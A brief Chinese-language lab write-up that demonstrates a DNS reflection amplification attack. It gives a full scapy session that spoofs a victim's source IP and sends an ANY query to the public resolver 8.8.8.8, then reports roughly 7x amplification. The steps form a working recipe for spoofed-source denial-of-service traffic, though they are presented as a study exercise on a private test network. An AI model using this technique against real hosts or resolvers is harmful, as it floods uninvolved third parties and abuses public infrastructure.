cyber-security

DNS反射放大攻击

准备2台机器


172.28.6.132 发包伪造133机器源IP
172.28.6.133 收包

构造IP数据包

利用scapy 工具构造IP数据包
构造过程如下:


$ sudo scapy
$ >>> i=IP()
$ >>> i.src="172.28.6.133"
$ >>> i.dst="8.8.8.8"
$ >>> u=UDP()
$ >>> d=DNS()
$ >>> d.qdcount=1
$ >>> dr=DNSQR()
$ >>> dr.qname="baidu.com"
$ >>> dr.qtype=255
$ >>> d.qd=dr
$ >>> r=(i/u/d)
$ >>> r.display()
###[ IP ]###
  version   = 4
  ihl       = None
  tos       = 0x0
  len       = None
  id        = 1
  flags     =
  frag      = 0
  ttl       = 64
  proto     = udp
  chksum    = None
  src       = 172.28.6.133
  dst       = 8.8.8.8
  \options   \
###[ UDP ]###
     sport     = domain
     dport     = domain
     len       = None
     chksum    = None
###[ DNS ]###
        id        = 0
        qr        = 0
        opcode    = QUERY
        aa        = 0
        tc        = 0
        rd        = 1
        ra        = 0
        z         = 0
        ad        = 0
        cd        = 0
        rcode     = ok
        qdcount   = 1
        ancount   = 0
        nscount   = 0
        arcount   = 0
        \qd        \
         |###[ DNS Question Record ]###
         |  qname     = 'baidu.com'
         |  qtype     = ALL
         |  qclass    = IN
        an        = None
        ns        = None
        ar        = None
$ >>> sr1(r) // 发包

抓包显示

  1. 发包机器

  1. 收包机器

总结

由上可以看到,udp可以轻易的实现篡改源IP的操作,从而可以利用一些应用和协议的问题进行放大操作,例如上面发包的69byte的包,最后打到目标机器有529byte,从而放大了7倍多。